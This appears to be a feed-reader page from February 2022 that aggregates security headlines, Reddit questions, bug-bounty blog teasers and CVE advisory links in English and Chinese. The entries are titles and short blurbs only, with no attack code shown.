    Currently the company I work for sends sensitive documents over email.They Password protect them but then send the password also using email format. submitted by /u/Linux98 [link] [comments]  ( 3 min )
    Is it safe to send my SSN over email to a Loan officer email, since she will need it to open up my credit report?
    My mom and I in the process of trying to buy an apartment together. Mom will put it under my name. This is first time im doing this and she told me i needed to email my SSN to the loan officer. I have protonmail which is secure mail and is encrypted email. Would it be safe to send my SSN over email to the loan officer in this case since she would need it to open my credit report. I do not know if the officer loan email is encrypted or not Or should i give her my SSN in another way such as telling her on the phone call to be on the safe side? or would be email be just fine? submitted by /u/Wastedmess [link] [comments]  ( 3 min )
    Regarding changing passwords and NIST (My google-fu is failing me)
    NIST states in NIST Special Publication 800-63B under section 5.1.1.2 Memorized Secret Verifiers that: "Verifiers SHOULD NOT impose other composition rules (e.g., requiring mixtures of different character types or prohibiting consecutively repeated characters) for memorized secrets. Verifiers SHOULD NOT require memorized secrets to be changed arbitrarily (e.g., periodically). However, verifiers SHALL force a change if there is evidence of compromise of the authenticator. " I'm a real stickler and was wondering if anyone knows what main research papers or investigations made them come to the recommendations above? Additionally are there any respected research authority on these type of questions in IT-sec? Thanks! submitted by /u/someuserman [link] [comments]  ( 3 min )
    Company Phone in Sealed Box - Possible to be Monitored?
    Just got my company phone and it’s brand new in the sealed manufacturers box and even has the carriers sticker on it still. Is there any possible way my company could be monitoring my activity on this phone beyond the calls being made and quantity of texts/data usage? submitted by /u/sektrONE [link] [comments]  ( 3 min )
  • Open

    Self-Testing: Red Team Augmentation
    Red Team testing and Penetration testing are key controls to utilize as part of maintaining a mature security program. There is the… Continue reading on Medium »  ( 5 min )
  • Open

    Local Privilege Escalation Vulnerability Discovered snap-confine(CVE-2021-44731)
    Article URL: https://blog.qualys.com/vulnerabilities-threat-research/2022/02/17/oh-snap-more-lemmings-local-privilege-escalation-vulnerability-discovered-in-snap-confine-cve-2021-44731 Comments URL: https://news.ycombinator.com/item?id=30378103 Points: 2 # Comments: 1  ( 5 min )
    Zabbix SAML Authentication Bypass (CVE-2022-23131) and more
    Article URL: https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage/ Comments URL: https://news.ycombinator.com/item?id=30372198 Points: 2 # Comments: 0  ( 9 min )
  • Open

    Local Privilege Escalation Vulnerability Discovered snap-confine(CVE-2021-44731)
    Article URL: https://blog.qualys.com/vulnerabilities-threat-research/2022/02/17/oh-snap-more-lemmings-local-privilege-escalation-vulnerability-discovered-in-snap-confine-cve-2021-44731 Comments URL: https://news.ycombinator.com/item?id=30378103 Points: 2 # Comments: 1  ( 5 min )
    T2 Mac security vulnerability means passwords can now be cracked
    Article URL: https://9to5mac.com/2022/02/17/t2-mac-security-vulnerability-passware/ Comments URL: https://news.ycombinator.com/item?id=30374224 Points: 32 # Comments: 6  ( 4 min )
  • Open

    Top 10 API Bugs — Where To Find Them
    Ladies and Gentlemen, let’s do some API hacking today. I will discuss some of the top 10 API bugs and where one can find them. Continue reading on Medium »  ( 5 min )
    403 forbidden bypass & Accessing config files using a header
    This is my first writeup on how i bypass 403 & accessed the config file Continue reading on Medium »  ( 1 min )
    Beginner’s Guide to Bug Bounty Hunter
    How much money can you make as a bug bounty hunter? That’s the burning question on everyone’s mind, and it’s one that will take some time… Continue reading on Medium »  ( 3 min )
    Apple pays $100,500 to a student who discovered Mac webcam vulnerability
    Ryan Pickren, a cyber security student was awarded $100,500 (around 75 lakhs) as a bounty, after he showed Apple how a vulnerability… Continue reading on Medium »  ( 2 min )
    Bug Bounty: Should You Go Full-Time?
    In the comments, I was asked what turned out to be more profitable in terms of money as a result — my previous job as a developer or… Continue reading on Medium »  ( 2 min )
  • Open

    Public STIX STIX2 TAXII Threat Actor Specific Threat Intelligence Feed - Your Lifetime API Key!
    Hi, everyone, This is Dancho. Big news! I've decided to make approximately 15 years of active and unique threat actor specific research publicly accessible online for free using the OpenCTI STIX STIX2 TAXII platform and not only convert all the cool and juicy and full of never-published and discussed before niche threat actors both internationally and in Russia but also make them into a free STIX STIX2 TAXII threat intelligence feed and turn them into a machine readable format with the idea to centralize and speed up the communication of my research and potentially allow you to better catch up improve your situational awareness and learn new things about the international bad guys including the bad guys in Russia including their Internet infrastructure and catch up with who they are and w…
  • Open

    Learning secrets management in the modern world using OWASP WrongSecrets Project : Hands-on Labs, CTF style challenges
    submitted by /u/madhuakula [link] [comments]  ( 1 min )
    Exploiting Jenkins build authorization
    submitted by /u/Alternative_Tour9985 [link] [comments]
    Tutorial: Kubernetes Vulnerability Scanning & Testing KubiScan & KubeSploit
    submitted by /u/jat0369 [link] [comments]
    CVE-2022-23131 - Zabbix SAML Authentication Bypass
    submitted by /u/monoimpact [link] [comments]  ( 1 min )
    Advisory: Cisco RV340 Dual WAN Gigabit VPN Router (RCE over LAN)
    submitted by /u/g_e_r_h_a_r_d [link] [comments]
  • Open

    SecWiki News 2022-02-17 Review
    WordPress 生态中恶意插件的大规模研究 by Avenger 2021年工业控制网络安全态势白皮书 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-02-17 Review
    WordPress 生态中恶意插件的大规模研究 by Avenger 2021年工业控制网络安全态势白皮书 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Avoiding Mixed Content Errors with an HTTPS Python Server
    Disclaimer: To set up a secure Python server, we need a domain name that we can access. 1. Introduction At some point during penetration testing, bug hunting, and capture the flag competitions, we will likely need to download a file or send a request to a server that we can access. Depending on what we... The post Avoiding Mixed Content Errors with an HTTPS Python Server appeared first on TrustedSec.  ( 9 min )
  • Open

    Subdomain Takeover of brand.zen.ly
    Zenly disclosed a bug submitted by mega7: https://hackerone.com/reports/1474784 - Bounty: $750
    Missing SPF record on trycourier.app
    Courier disclosed a bug submitted by musab_alharany: https://hackerone.com/reports/1416701
  • Open

    Weblogic HomeHandle反序列化漏洞分析和研究
    本篇文章主要是针对CVE-2022-21350的详细分析和研究,以探讨安全技术为目的。  ( 1 min )
    美国称俄罗斯国家黑客破坏了国防承包商
    据报道,俄罗斯黑客组织发动对美国CDCs的持续性攻击。  ( 1 min )
    小心了,即将推出的Chrome、Firefox100可能存在严重风险
    即将推出的 Firefox 100和 Chrome 100版本浏览器存在严重风险,在解析包含三位数版本号的用户代理字符串时可能会破坏网站。  ( 1 min )
    schoolcms 代码审计
    最近一直在研究thinkphp的框架,今天找了一个cms进⾏审计,发现了两处注入点,由此来进行分析一下。  ( 1 min )
    机器学习会成为数据安全新威胁和后门吗?
    研究机器学习和人工智能系统安全的专家警告称,未来这类系统可能被专业的攻击者所利用。  ( 1 min )
    FreeBuf早报 | 美国称俄罗斯黑客入侵多个国防部承包商;Trickbot针对60家名企客户
    红十字国际委员会(ICRC)最近遭到网络攻击,超过51.5万名“高危人群”的数据被泄露,这很可能是国家支持的黑客所为。  ( 1 min )
    打满马赛克就安全?新技术已能够从像素化图像中还原文本信息
    本周,安全公司Bishop Fox 的首席研究员从像素化的文本图像中清楚地恢复了其中的字母信息。  ( 1 min )
    2022 年值得关注的 10 家最热门 XDR 安全公司
    注:本文转自SDNLAB,仅供查阅 据研究机构 Forrester 称,扩展检测和响应 (XDR) 市场目前还处于早期阶段,现有的  ( 1 min )
  • Open

    Browser Forsensics — CyptoMiner
    Challenge Description  ( 3 min )
    Phishing: Creating and Analyzing
    Hello everyone,  ( 11 min )
    Memory Analysis — Ransomware (BlueTeamLabs)
    Challenge Description:  The Account Executive called the SOC earlier and sounds very frustrated and angry. He stated he can’t access any…  ( 3 min )
  • Open

    Browser Forsensics — CyptoMiner
    Challenge Description  ( 3 min )
    Phishing: Creating and Analyzing
    Hello everyone,  ( 11 min )
    Memory Analysis — Ransomware (BlueTeamLabs)
    Challenge Description:  The Account Executive called the SOC earlier and sounds very frustrated and angry. He stated he can’t access any…  ( 3 min )
  • Open

    Browser Forsensics — CyptoMiner
    Challenge Description  ( 3 min )
    Phishing: Creating and Analyzing
    Hello everyone,  ( 11 min )
    Memory Analysis — Ransomware (BlueTeamLabs)
    Challenge Description:  The Account Executive called the SOC earlier and sounds very frustrated and angry. He stated he can’t access any…  ( 3 min )

  • Open

    Broken Authentication Session Token Bug
    Courier disclosed a bug submitted by the_hacker_girl: https://hackerone.com/reports/948345
  • Open

    Company refuses to provided any training for our SOC
    Since joining multiple analysts have requested some type of training whether it’s vendor specific for tools like the SIEM or vendor neutral training such as SANS but management keeps saying our department is “self-taught” and there is no training budget. Which is odd considering how big of a corporation it is and how successful it is. Personally I’m shocked as the companies I’ve worked for in the past all provided some type of training. How can I make a compelling case for getting our SOC analysts training? submitted by /u/bankster24 [link] [comments]  ( 2 min )
    what are some affordable and credible penetration testing certifications?
    i am a new penetration tester and i want to gather some certifications for me to be able to further my career. however i have observed that cybersecurity certifications are particularly expensive, so like the Certified Ethical Hacker (CEH) certifcation costs 1200 USD which is a lot since i am planning to pay them by myself.. ​ i recently saw elearnsecurity , particularly the eJPT and it only costs 200 USD which i think is great since it shows that i have some real world and hands on capabilities as a penetration tester.. so are there any other certifications like the eJPT which is affordable and credible? preferrably around the same or better if lower price than the eJPT ​ thank you submitted by /u/darkalimdor18 [link] [comments]  ( 3 min )
    Book recommendations
    Looking for some good books to study up on foundational Network Concepts and maybe some stuff that could help me prepare for Network+ submitted by /u/Wintermane45 [link] [comments]
  • Open

    What makes a great incident response engineer?
    submitted by /u/Real_Score_5035 [link] [comments]  ( 1 min )
    QUESTION: confiscated phone asks to update whatsapp
    Good afternoon, My local department wants to manually check whatsapp messages on a phone. The phone has been in flight mode since we've confiscated it. We ran into the issue that when we want to launch whatsapp it asks to update the whatsapp software. If we want to do this this means that we'll have to hook it up to our wifi network. Does this mean that if the suspect has deleted his messages through whatsapp.web / other phone that this will also be synched with the whatsapp on the phone? I also believe that whatsapp is linked to a phone number. So it would rather be impossible for the suspect to get on his whatsapp without his sim-card(this is in our possesion as well). We also use the UFED cellebrite, but whatsapp conversations don't always come through. So what are our options to be able to get back into whatsapp without loss of data? ​ Thanks! submitted by /u/Tniso [link] [comments]  ( 1 min )
  • Open

    Adobe Patches Critical RCE Vulnerability in Magento2
    On Sunday, February 13th, Adobe pushed an emergency update to their Magento2 ecommerce software patching a critical unauthenticated remote code execution vulnerability. It is marked as CVE-2022-24086 with a CVSS score of 9.8. Website administrators of Magento stores should patch immediately. Shop owners of Magento 2.3 or 2.4 stores can find the patch to install here. Instructions on how to install Magento security patches via Composer can be found here. Our website firewall generic rules block RCE exploitation attempts by default but given the severity of the vulnerability website administrators should not leave their websites unpatched. Continue reading Adobe Patches Critical RCE Vulnerability in Magento2 at Sucuri Blog.
  • Open

    Lodestar Joins the Consensus Layer Bug Bounty
    ChainSafe is happy to announce that we’ve been added to the Ethereum Foundation’s consensus layer bug bounty program for Lodestar, our… Continue reading on ChainSafe »  ( 1 min )
    File Inclusion Vulnerabilities - Cyber Sapiens Internship Task-19
    Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly… Continue reading on Medium »  ( 2 min )
    Insecure Direct Object Reference- Cyber Sapiens Internship Task-18
    Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly… Continue reading on Medium »  ( 4 min )
    No Rate Limiting Vulnerability & Bypasses - Cyber Sapiens Internship Task-17
    Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly… Continue reading on Medium »  ( 2 min )
    Directory Listing Vulnerability - Cyber Sapiens Internship Task-16
    Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly… Continue reading on Medium »  ( 3 min )
    Bug Report; Bypassing Weekly Limits In Basic (Free) LinkedIn Account
    Publishing my first Security Vulnerability report for LinkedIn.Below is the report that I have submitted to LinkedIn Information Security… Continue reading on Medium »  ( 2 min )
    Hacked Dutch Government Website. All I got was this l̶o̶u̶s̶y̶ cool T-Shirt.
    They are right. Persistence is the key ! Continue reading on Medium »  ( 1 min )
    What is CSRF Attack ?
    Cross-Site Request Forgery (CSRF) is an attack that forces authenticated users to submit a request to a Web application against which they… Continue reading on Medium »  ( 2 min )
    My First Reflected XSS Bug Bounty — Google Dork — $xxx
    Today I will share a Reflected XSS vulnerability that was reported by me and i found this with google dorks… Continue reading on InfoSec Write-ups »  ( 3 min )
    ImmuneFi y Octopus Network Lanzan Jugoso Bug Bounty
    Octopus Network 🐙 Continue reading on Medium »  ( 3 min )
  • Open

    ‘Ice phishing’ on the blockchain
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    SecWiki News 2022-02-16 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-02-16 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Machine Learning Enrichment in your Data Asset Production Flow
    How discursus tackled the challenge of introducing ML enrichments in data asset production flows, using Dagster, dbt and Novacene AI. Continue reading on discursus.io »  ( 5 min )
    Power of Reverse Image Search — OSINT Challenge 16
    On Dec 22, 2021, Quiztime (contributor @twone2) shared a new OSINT quiz with us. Continue reading on Medium »  ( 1 min )
  • Open

    如何做好安全研发人才招聘之如何招人
    人是很顽固的一种生物,大部分人成年以后很难改变固有的思维定势。从这个角度来讲,选拔的重要性大于培养。
    “大规模混合战争”阴影下的乌克兰
    “开战日”,cctv13 播报中没有出现大规模战争的血腥画面,俄乌双方似乎都陷入了静默的状态。  ( 1 min )
    FreeBuf早报 | 乌军事机构和银行受网络攻击;新加坡将推出强有力的反诈骗措施
    从2022年2月15日下午开始,乌克兰国防部和武装部队以及国有银行遭到DDoS攻击  ( 1 min )
    线上+线下全覆盖!CIS 2021大会·春日版「新玩法」抢先揭秘
    各位FreeBuf的新老朋友大家好,CIS 2021议题来啦~  ( 1 min )
    啪啪打脸,国际互联网协会数据泄露
    作为互联网世界相关标准的制定、推广的机构,以推动互联网的发展为己任,却也因为网络安全漏洞出现信息被泄露事件,让人颇感尴尬。  ( 1 min )
    Yak基础插件案例——CDN检测
    内容分发网络(CDN)是指一种透过互联网互相连接的电脑网络系统,本文从CDN以及CDN的配置先说起,详解Yak基础插件案例。  ( 3 min )
    新型勒索病毒Coffee潜伏期高达百日,360解密大师独家支持解密
    近日,360安全大脑监测发现一种具有蠕虫性质的新型勒索病毒Coffee存在大范围传播的风险。
    调查显示,零信任战略受到 CSO 好评
    实施零信任是作为降低网络风险的有效方式。  ( 1 min )
    Swissport遭受BlackCat勒索攻击
    瑞士Swissport空港服务公司遭勒索软件攻击,一度导致航班延误和服务中断。
    乌克兰银行和军事机构遭受了DDoS攻击
    昨日下午,乌克兰国防部和武装部队,以及该国的两家国有银行受到了分布式拒绝服务(DDoS)的攻击。
    跳槽被公司无死角监控?这个盖子终于捂不住了
    伴随着国内相关法律法规的落地和民众隐私保护意识的觉醒,这个盖子终于捂不住了。当盖子被掀开时,我们需要重新审视这个问题。  ( 1 min )
  • Open

    The Ultimate Secret To Red Team Engagements
    The key to a successful engagement is well-coordinated planning and communication through all parties involved. This blog post would focus… Continue reading on Medium »  ( 1 min )
    Here is how you can become an ethical hacker
    Ethical hackers are experienced professionals who find exploitable bugs and report to increase the cybersecurity posture of an… Continue reading on Medium »  ( 1 min )
  • Open

    Windows Privilege Escalation: SpoolFool
    Introduction Oliver Lyak posted a write-up about a Windows Privilege Escalation vulnerability that persisted in Windows systems even after patching of previous vulnerabilities in Print The post Windows Privilege Escalation: SpoolFool appeared first on Hacking Articles.  ( 8 min )
  • Open

    Windows Privilege Escalation: SpoolFool
    Introduction Oliver Lyak posted a write-up about a Windows Privilege Escalation vulnerability that persisted in Windows systems even after patching of previous vulnerabilities in Print The post Windows Privilege Escalation: SpoolFool appeared first on Hacking Articles.  ( 8 min )
  • Open

    My First Reflected XSS Bug Bounty — Google Dork — $xxx
    Today I will share a Reflected XSS vulnerability that was reported by me and i found this with google dorks… Continue reading on InfoSec Write-ups »  ( 3 min )
    Walkthrough — Hacktoria: Geolocation 11
    Once again I am back with a walkthrough to a GEOINT challenge. I will be explaining how to solve Geolocation 11 practice test on…  ( 6 min )
    SHODAN is the true Internet search engine — Here’s why?
    Unlike Google, which scans only for ports 80 & 443, Shodan is the true… Continue reading on InfoSec Write-ups »  ( 3 min )
    PRACTICAL MALWARE ANALYSIS LAB PART — I
    This lab uses the files Lab01–01.exe and Lab01–01.dll. Use the tools and tech- niques described in the chapter to gain information about…  ( 5 min )
    Attack Surface Monitoring using Open-Source Intelligence
    The paper introduces the case study for attack surface analysis and monitoring with practical application of open-source intelligence…  ( 9 min )
    TryHackMe: Team
    Walk-Through  ( 4 min )
  • Open

    My First Reflected XSS Bug Bounty — Google Dork — $xxx
    Today I will share a Reflected XSS vulnerability that was reported by me and i found this with google dorks… Continue reading on InfoSec Write-ups »  ( 3 min )
    Walkthrough — Hacktoria: Geolocation 11
    Once again I am back with a walkthrough to a GEOINT challenge. I will be explaining how to solve Geolocation 11 practice test on…  ( 6 min )
    SHODAN is the true Internet search engine — Here’s why?
    Unlike Google, which scans only for ports 80 & 443, Shodan is the true… Continue reading on InfoSec Write-ups »  ( 3 min )
    PRACTICAL MALWARE ANALYSIS LAB PART — I
    This lab uses the files Lab01–01.exe and Lab01–01.dll. Use the tools and tech- niques described in the chapter to gain information about…  ( 5 min )
    Attack Surface Monitoring using Open-Source Intelligence
    The paper introduces the case study for attack surface analysis and monitoring with practical application of open-source intelligence…  ( 9 min )
    TryHackMe: Team
    Walk-Through  ( 4 min )
  • Open

    My First Reflected XSS Bug Bounty — Google Dork — $xxx
    Today I will share a Reflected XSS vulnerability that was reported by me and i found this with google dorks… Continue reading on InfoSec Write-ups »  ( 3 min )
    Walkthrough — Hacktoria: Geolocation 11
    Once again I am back with a walkthrough to a GEOINT challenge. I will be explaining how to solve Geolocation 11 practice test on…  ( 6 min )
    SHODAN is the true Internet search engine — Here’s why?
    Unlike Google, which scans only for ports 80 & 443, Shodan is the true… Continue reading on InfoSec Write-ups »  ( 3 min )
    PRACTICAL MALWARE ANALYSIS LAB PART — I
    This lab uses the files Lab01–01.exe and Lab01–01.dll. Use the tools and tech- niques described in the chapter to gain information about…  ( 5 min )
    Attack Surface Monitoring using Open-Source Intelligence
    The paper introduces the case study for attack surface analysis and monitoring with practical application of open-source intelligence…  ( 9 min )
    TryHackMe: Team
    Walk-Through  ( 4 min )
  • Open

    Almost every publicly available CVE PoC
    Article URL: https://github.com/trickest/cve Comments URL: https://news.ycombinator.com/item?id=30357373 Points: 104 # Comments: 14  ( 3 min )
  • Open

    Termux Apps Vulnerability Disclosures
    Article URL: https://termux.github.io/general/2022/02/15/termux-apps-vulnerability-disclosures.html Comments URL: https://news.ycombinator.com/item?id=30357335 Points: 2 # Comments: 0  ( 9 min )
  • Open

    How can I download a React site to edit it locally?
    I have done this before with wget and had no problems, however, I am trying to download this react app and am having a very hard time. For some reason it is only downloading the index.html page and when I click on another tab I get "GET /example" Error (404): "Not found" However, when I run wget on the /example page and grab example.html then it works, but this is not feasible for every page that I need to run. I am calling: wget --random-wait -r -p -e robots=off -U mozilla https://example.com What am I doing wrong / is there a better tool to do this? The site is hosted on Vercel and uses the Next.js framework Any help is much appreciated :) submitted by /u/tokentrader [link] [comments]  ( 2 min )
  • Open

    黑客组织 TA2541 解析
    译者:知道创宇404实验室翻译组 原文链接:https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight 主要发现 Proofpoint研究人员多年来一直在追踪一个针对航空、航天、交通、制造业和国防工业的持续网络犯罪者。 黑客者一贯使用远程访问木马(rat) ,可用于远程控制受到感染的机器。 黑客关注了与...
    黑客组织 TA2541 解析
    译者:知道创宇404实验室翻译组 原文链接:https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight 主要发现 Proofpoint研究人员多年来一直在追踪一个针对航空、航天、交通、制造业和国防工业的持续网络犯罪者。 黑客者一贯使用远程访问木马(rat) ,可用于远程控制受到感染的机器。 黑客关注了与...
  • Open

    黑客组织 TA2541 解析
    译者:知道创宇404实验室翻译组 原文链接:https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight 主要发现 Proofpoint研究人员多年来一直在追踪一个针对航空、航天、交通、制造业和国防工业的持续网络犯罪者。 黑客者一贯使用远程访问木马(rat) ,可用于远程控制受到感染的机器。 黑客关注了与...
    黑客组织 TA2541 解析
    译者:知道创宇404实验室翻译组 原文链接:https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight 主要发现 Proofpoint研究人员多年来一直在追踪一个针对航空、航天、交通、制造业和国防工业的持续网络犯罪者。 黑客者一贯使用远程访问木马(rat) ,可用于远程控制受到感染的机器。 黑客关注了与...

  • Open

    Why would a civilian private network be using an public IP range internally for device assignments (military netblock at that)?
    I was visiting a popular big box store today and was looking at one of their WiFi printers and saw this: https://imgur.com/a/fTZ1Emc Any idea why they are using a public ip range instead of something internal like 192, 172, 10 etc for IP assignments? The netblock according to ARIN belongs to the DoD (https://whois.domaintools.com/7.117.1.1) Just to make sure it wasn't a fluke, I also looked at another device on their network which also had a 7.117 IP. I just thought it was very strange. Any ideas? submitted by /u/LyleTillman [link] [comments]  ( 2 min )
    What's the Biggest Turn Off in Regards to Offensive Frameworks?
    I'm referring to software such is Metasploit, CobaltStrike, Armitage, Ramcos, etc.... submitted by /u/Blagojee [link] [comments]  ( 1 min )
    Burp Suite certificate question
    I was wondering if anyone has recently done their burp suite practioner exam cert recently and how relatable it is to their practice test? Is burp suite pro REALLY necessary for the test? Just curious because it's for work and I don't want to pay for pro to not use it. My work has boxes setup with pro so my personal liscense won't be utilized except for the test. submitted by /u/phishingsudo [link] [comments]  ( 1 min )
    Is it possible to route ALL traffic from an idevice through a VPN?
    I'm somewhat new to idevice admin, so please excuse any ignorance. Is it possible to route literally ALL packets from an iPhone through a VPN? We're trying to get some stuff set up and we implemented a VPN by way of a user-installable app. Unfortunately it seems that on iOS there are a lot of connections that bypass this. For example when first connected to a wifi network the iPhone spams a flurry of connections to Apple's servers which don't go through the VPN. I've confirmed this by creating an "evil" wifi network that supports ipv4 only and blocks any connections to the 17.x.x.x range (which is wholly owned and operated by Apple), and even with the VPN active the logs show hundreds of connection attempts persistently. If I also block all Apple domains then half the stuff on the phone no longer works. App-based connections are routed correctly (Safari, etc), but the phone completely ignores the VPN for both DNS lookups and the connections themselves when it comes to system stuff and I'm not sure why. From my research it seems that maybe we need to ditch the app idea and instead implement an "always on" VPN by way of a mobileconfig file. This appears to require the iPhones to be supervised through MDM, which isn't a problem. I've taken a test phone, wiped and supervised it, but I'm having trouble figuring out how to create a mobileconfig that does what we want. Before I burn too many hours messing with this I'm wondering if anyone can help with the following two questions: Will an "always on" VPN on an iPhone actually route ALL packets through the VPN (including the system level phone-home initialization stuff, DNS lookups, ntp, etc) or is this not even the right approach? Assuming (1) is the correct approach, can someone point me to an example mobileconfig file that implements this so I can look at the structure and have a better idea of what I'm doing? submitted by /u/sneakertech [link] [comments]  ( 2 min )
    What are my options for an encrypted bootable flash drive containing 2 Linux OS, selection of which would be done by password alone at the bootloader / pre-boot stage.
    I want an encrypted bootable flash drive which contains 2 LINUX OS. The existence of either OS should be impossible to determine without a password. The flash drive should boot to a BOOTLOADER password prompt. Entering a wrong password should do nothing Entering password A should boot OS A Entering password B should boot OS B After boot of A, it should not be possible to prove the existence of B After boot of B, it should not be possible to prove the existence of A (i.e. if, by booting one of the OS, it is then possible to see that half the flash drive is 'unallocated' then we have probably failed our task) You're already thinking 'plausible deniability' is the phrase im looking for. Yes you're right - thats exactly what I want. I want what Veracrypt can do, but I want it for Linux, not Windows. Is it possible? I've looked at LUKS, but I dont see that it can do what I want. Thanks for any suggestions. submitted by /u/boli99 [link] [comments]  ( 1 min )
    Is law enforcement/fed/military experience pretty much mandatory to become good at DFIR?
    We can say you can self study, learn all the material, join a SOC and pray for a promotion, get certifications, etc. I don't see a whole ton of jobs open for DFIR without explicit mention of tools, processes, and experience that one would have to accumulate in one of those sectors that isn't gated by 5-10 years of experience doing it. Additionally, it seems to me that most of the people who are pumping out books and learning material come from some kind of government background where they did incident response. Almost all hiring managers I've met have significant LE experience behind them. What I see much more of is people without this govt background going into pentesting, policy work, etc. Are you pretty much screwed for getting into DFIR at a large corp without a three letter agency or military on the resume? submitted by /u/Different-Area-3053 [link] [comments]  ( 2 min )
    Forensics Toolkits Recommendations? GCP Linux VM may have been compromised and use for crypto mining :/
    Hey y'all! I have a VM that was flagged by Google for potential compromise and being used for crypto mining (the CPU was flat out 50%, continuously for last several days). I immediately took down the machine, snapshotted and imaged it; rotated all security keys for GCP account. I don't think there is any nefarious activity and the compromise was likely to this one machine (or maybe I think that). I would like to find a tool that can show me last logins, various logs, any suspicious software etc. so that I can start digging or escalate. What tools, if any, would you recommend? I have been running individual commands like last, utmpdump, scrubbing logs manually but I figured there has to be a tool to make this easy. submitted by /u/sidgup [link] [comments]  ( 2 min )
  • Open

    How do I secure WordPress Websites for Free?
    Protecting Content Management Systems (CMS) installed on a hosting server is crucial in today’s ever-growing world wide web, but how to I protect my WordPress website on a tight budget? There are tons of options available on this front, but it can be overwhelming to make the right decision in website protection that fits into your budget. In this article, however, we’ll be covering the basics of efficiently securing your WordPress website at no cost.  Continue reading How do I secure WordPress Websites for Free? at Sucuri Blog.
  • Open

    ImmuneFi Bug Bounty Launched!
    Octopus Network is a brand new multichain network born to serve application-specific blockchains, aka appchains. Octopus Network provides… Continue reading on Octopus Network »  ( 2 min )
    Yet another enumeration of subdomains with statistics
    Or how to collect million of bugbounty subdomains in order to make a few wordlists. Continue reading on Medium »  ( 1 min )
    Do you want to start your career in Cyber Security — Read This .
    Cyber Security - Learn hack Secure. Continue reading on Medium »  ( 3 min )
    100 Days of Hacking — Day 10
    What’s up guys it’s the 10th day of #100DaysofHacking. 10% of the goal is achieved let’s go through today’s objectives and report Continue reading on Medium »  ( 2 min )
    Bug Bounty Stress aka Burnout: do and don’t
    Don’t stress yourself too much! Continue reading on Medium »  ( 3 min )
    HigherLogic RCE In _VSTATE .NET
    Remote code execution (RCE) is a class of software security flaws/vulnerabilities. RCE vulnerabilities will allow a malicious actor to… Continue reading on Medium »  ( 1 min )
    PORTSWIGGER WEB SECURITY - FILE UPLOAD LAB ÇÖZÜMLERİ
    File Upload (Dosya Yükleme), kullanıcının bir web sunucusuna dosya yüklemesine denir. Web sayfaları kullanıcıdan dosya yüklemesi için… Continue reading on Medium »  ( 10 min )
    Jax.Money testing: rewards up to $20,000 and more!
    by Ramyata Rao, Digital Marketing Manager at Jax.Network Continue reading on Jax.Network Blog »  ( 4 min )
    ​​How Did I Start Doing Bug Bounty?
    Since school, I have been reading Hacker (the Russian offensive security magazine) when I had the opportunity to buy it (then it was still… Continue reading on Medium »  ( 2 min )
    Bug Bounty: Low Hanging Fruit
    Low-hanging fruit are bugs that are very easy to find. I would divide them into 2 more types. Continue reading on Medium »  ( 1 min )
  • Open

    A technique to semi-automatically discover new vulnerabilities in WordPress plugins
    submitted by /u/kazetkazet [link] [comments]
    GoIP-1 GSM gateway could be harnessed for phone fraud by hackers
    submitted by /u/ValtteriLe [link] [comments]
    Dependabot alternative for Clojure
    submitted by /u/mthbernardes [link] [comments]
    CVE-2021-44521 – Exploiting Apache Cassandra User-Defined Functions for Remote Code Execution
    submitted by /u/SRMish3 [link] [comments]
    A CLI SAST (Static application security testing) tool which was built with the intent of finding vulnerable Clojure code via rules that use a simple pattern language.
    submitted by /u/mthbernardes [link] [comments]  ( 1 min )
    merOS-virt - Build and Interact with a Set of Virtual Machines.
    submitted by /u/AranAilbhe [link] [comments]  ( 2 min )
    Advisory: Western Digital My Cloud Pro Series PR4100 RCE
    submitted by /u/g_e_r_h_a_r_d [link] [comments]  ( 1 min )
  • Open

    Horizontall HackTheBox Walkthrough
    Introduction Horizontall is an “easy” rated CTF Linux box on Hack The Box platform. The box covers initial compromise by exploiting Strapi RCE vulnerability and The post Horizontall HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    Horizontall HackTheBox Walkthrough
    Introduction Horizontall is an “easy” rated CTF Linux box on Hack The Box platform. The box covers initial compromise by exploiting Strapi RCE vulnerability and The post Horizontall HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    Google Rewards Indian Techie With $8.7M in vulnerability rewards
    Article URL: https://www.indiatimes.com/technology/news/google-thanks-indian-researcher-android-chrome-bug-561975.html Comments URL: https://news.ycombinator.com/item?id=30349459 Points: 9 # Comments: 1  ( 2 min )
  • Open

    An OSINT Path — In TryHackMe
    Hello Friends, Continue reading on Medium »  ( 1 min )
    Honeypot — Seoul, South Korea (Threat Analysis)
    안녕하세요! Continue reading on Medium »  ( 5 min )
    TryHackMe Sakura Room CTF Write-Up
    My wired, unexplainable urge to get OSINT Dojo's Student Rank Badge has led me to this CTF, and now that I'm here, I realize that I can… Continue reading on Medium »  ( 4 min )
    Hacktoria: Geolocation 13 (Walkthrough)
    Hacktoria: Geolocation 13 (Walkthrough) Continue reading on Medium »  ( 1 min )
  • Open

    Work From Home Productivity Tips
    For many of us, working from home is here to stay, but it does come with its own challenges. This article contains some of the best tips and tricks from TrustedSec consultants on how to stay focused at home. Set an alarm to start and stop working Alarms can be set in shorter intervals, to... The post Work From Home Productivity Tips appeared first on TrustedSec.  ( 3 min )
  • Open

    SecWiki News 2022-02-15 Review
    终极Java反序列化Payload缩小技术 by ourren 求解网络安全问题的可解释机器学习 by ourren 从一例 Pegasus 误报说开去 by Avenger 绕过污点分析的一些思考 by ourren 2021网络金融黑产研究报告 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

